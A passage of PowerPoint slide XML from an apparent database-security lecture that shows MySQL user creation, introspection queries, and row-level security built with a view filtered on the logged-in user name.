              <a:t>2016-05-04’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Maintenance_Schedule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>; 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400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>create user Operator1;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:b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create user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Operator2;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:b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create user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Operator3;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt; set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>password for Operator1 = PASSWORD( ’operator1’ ); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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set password for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Operator2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>= PASSWORD( ’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>operator2’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt; set password for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Operator3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>= PASSWORD( ’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>operator3’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1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dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/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05760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Installation (8)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sz="2000" dirty="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>did not specify the hosts for the three Operator accounts. So MySQL will use the default ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>’ for them, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>implying </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>that they will be able to connect from anywhere </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>To find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>out which database you are currently </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>examining</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>database();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2000" dirty="0" smtClean="0"/>
              <a:t>To find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>out what you are logged in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>as</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>elect user();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>find out what version of MySQL you are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>running</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>select version();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>To find out all users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>elect User from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysql.user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</a:p>
          <a:p>
            <a:pPr marL="400050"/>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050"/>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0" smtClean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dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/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842663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Row-Level Security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sz="2000" dirty="0"/>
              <a:t>Row level security in MySQL is implemented with the help of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>views</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>In general, a view in MySQL is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>result table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>that would ordinarily be returned by a query such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> but with the difference that the result table exhibits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>persistence </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>view</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>persistent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>result table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Create a view </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Operator_view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1800" b="1" dirty="0" err="1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create view </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Operator_view</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> as select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Maintenance_Schedule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where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>operator_name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smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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substring_index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(user(),’@’,1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1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grant select on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Operator_view</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> to Operator1; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0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grant select on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Operator_view</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> to Operator2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</a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0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grant select on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Operator_view</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> to Operator3; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0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quit; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="20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dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/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552125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Row-Level Security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sz="1800" b="1" dirty="0" err="1" smtClean="0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create view </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Operator_view</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> as select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Maintenance_Schedule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt; where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>operator_name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smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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substring_index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(user(),’@’,1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>user()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>built-in function returns </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the user currently logged into MySQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>substring_index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>built</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>-in function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>that returns </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>substring from its first</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>-argument string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>by using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>the second argument substring as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>delimiter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> and the third argument integer as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>substrings </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>to return assuming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>there </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>are multiple occurrences of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>delimiter </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>user()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> returns </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
